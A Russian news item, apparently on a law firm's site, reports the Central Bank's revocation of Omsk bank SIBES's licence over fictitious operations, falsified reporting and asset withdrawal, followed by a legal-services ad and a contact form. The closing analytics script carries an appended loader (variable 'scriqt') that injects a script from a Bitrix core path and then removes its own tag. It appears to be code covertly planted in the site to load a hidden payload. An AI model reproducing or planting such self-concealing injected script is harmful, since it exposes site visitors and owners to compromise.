Центробанк России отозвал лицензию у омского банка «СИБЭС»

Центробанк России отозвал лицензию у омского банка «СИБЭС» Центробанк России отозвал лицензию у омского банка «СИБЭС»

Центральный банк России (ЦБ РФ) отозвал лицензию на осуществление банковских операций у банка «СИБЭС» (Омск), говорится в сообщении Банка России. Лицензия отозвана 28 апреля.
«Текущее состояние банк “Сибэс” характеризовалось наличием критически повышенных рисков, связанных с рефинансированием задолженности физических лиц и осуществлением “схемных” сделок с приобретенными у микрофинансовых организаций правами требования по потребительским займам. В деятельности банка установлено проведение “фиктивных” операций по замене активов, целью которых являлось сокрытие значительной недостачи денежных средств в кассе и реального финансового положения банка», — сказано в сообщении регулятора.

Также ЦБ РФ отметил, что руководство и собственника банка начали вывод активов, манипулировали отчетными данными, игнорировали требования надзорного органа о формировании адекватных принимаемым рискам резервов на возможные потери, провели ряд сомнительных транзитных операций клиентов с незначительной налоговой нагрузкой.

"В связи с установлением фактов существенной недостоверности отчетных данных соответствующие материалы будут направлены Банком России в Следственный комитет РФ для решения вопроса о возбуждении уголовного дела"
-Цетнробанк РФ

Приказом ЦБ 28 апреля в банк назначена временная администрация.
«Сибэс» — участник системы страхования вкладов. Отзыв лицензии является страховым случаем в отношении обязательств банка по вкладам населения и предусматривает выплату возмещения вкладчикам банка, в том числе индивидуальным предпринимателям, в размере 100% остатка средств, но не более 1,4 млн рублей на одного вкладчика.

Банк «Сибэс» по итогам I квартала 2017 года занял 342-е место по размеру активов в рэнкинге «Интерфакс-100», подготовленном «Интерфакс-ЦЭА».
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');